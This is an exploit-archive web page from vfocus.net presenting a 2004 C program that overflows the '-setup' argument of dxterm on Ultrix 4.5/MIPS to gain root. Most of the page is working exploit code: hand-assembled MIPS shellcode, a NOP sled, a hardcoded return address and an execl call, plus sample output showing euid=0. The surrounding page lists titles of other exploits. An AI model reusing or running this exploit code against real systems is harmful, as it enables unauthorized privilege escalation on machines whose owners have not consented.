首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Ultrix 4.5/MIPS dxterm Local Buffer Overflow Exploit
来源:vfocus.net 作者:ztion 发布时间:2004-12-21  

Ultrix 4.5/MIPS dxterm Local Buffer Overflow Exploit

/* Ultrix 4.5/MIPS dxterm exploit
by ztion in 2004
Greets to: Stok, sidez

It wasn't possible to use '/' in the shellcode. Probably dxterm only
copies everything after the last slash, as it expects a path.
Since everything is pretty much hardcoded, you will probably have to
tweak it for versions other than 4.5

nora> ./ultrix_dxterm_4.5_exploit
$ id
uid=268(ztion) gid=15(users)euid=0(root)
*/

#include <stdio.h>

#define NOP 0x25f8e003
#define RET 0x7fffbe90

char shellcode[] = {
0x69,0x6e,0x19,0x3c, /* lui $t9, 0x6e69 */
0x2e,0x61,0x39,0x37, /* ori $t9, $t9, 0x612e */
0x38,0x01,0xb6,0x23, /* addi $s6, $sp, 312 */
0x01,0x01,0x39,0x23, /* addi $t9, $t9, 0x0101 */
0xf0,0xfe,0xd9,0xae, /* sw $t9, -272($s6) */
0x73,0x68,0x19,0x3c, /* lui $t9, 0x6873 */
0x11,0x11,0x06,0x24, /* li $a2, 0x1111 */
0x11,0x11,0xc6,0x38, /* xori $a2, $a2, 0x1111 */
0x2e,0x2e,0x39,0x37, /* ori $t9, $t9, 0x2e2e */
0xf0,0xfe,0xc4,0x26, /* addiu $a0, $s6, -272 */
0x01,0x01,0x39,0x23, /* addi $t9, $t9, 0x0101 */
0x3f,0x01,0x02,0x24, /* li $v0, 319 */
0xfc,0xfe,0x42,0x20, /* addi $v0, $v0, -260 */
0xf4,0xfe,0xd9,0xae, /* sw $t9, -268($s6) */
0xe8,0xfe,0xc4,0xae, /* sw $a0, -280($s6) */
0xf8,0xfe,0xc6,0xae, /* sw $a2, -264($s6) */
0xec,0xfe,0xc6,0xae, /* sw $a2, -276($s6) */
0xe8,0xfe,0xc5,0x26, /* addiu $a1, $s6, -280 */
0xcc,0xff,0xff,0x01 /* syscall */

};

int main(void)
{
char buf[256];
int i;


memset (buf, 2, 255);
i = 0;
while (i <= 8) {
((int *)(buf+1))[i] = NOP;
i++;
}

memcpy (buf+33, shellcode, sizeof(shellcode));

((int *)(buf+3))[29] = RET;
/* 119 - 122 is the return address */
buf[123] = '\0';

execl ("/usr/bin/dxterm", "dxterm", "-display", "localhost:0", "-setup", buf, NULL);
}



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Linux Kernel <= 2.6.9, <
·AIX 5.3/5.2/5.1 "paginit" loca
·Linux Kernel <= 2.6.9, <
·Santy.A - phpBB <= 2.0.10 W
·phpBB 2.x and PHP 4.3.9 unseri
·Webmin Remote BruteForce and C
·WinRAR <= 3.41 Compressed F
·Snort <= 2.2.10 Remote Deni
·Ability FTPd v2.34 Remote Comm
·Php Safe_mode Bypass Proof of
·Linux kernel 2.4 and 2.6 Multi
·AIX 5.1 to 5.3 lsmcode Local R
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved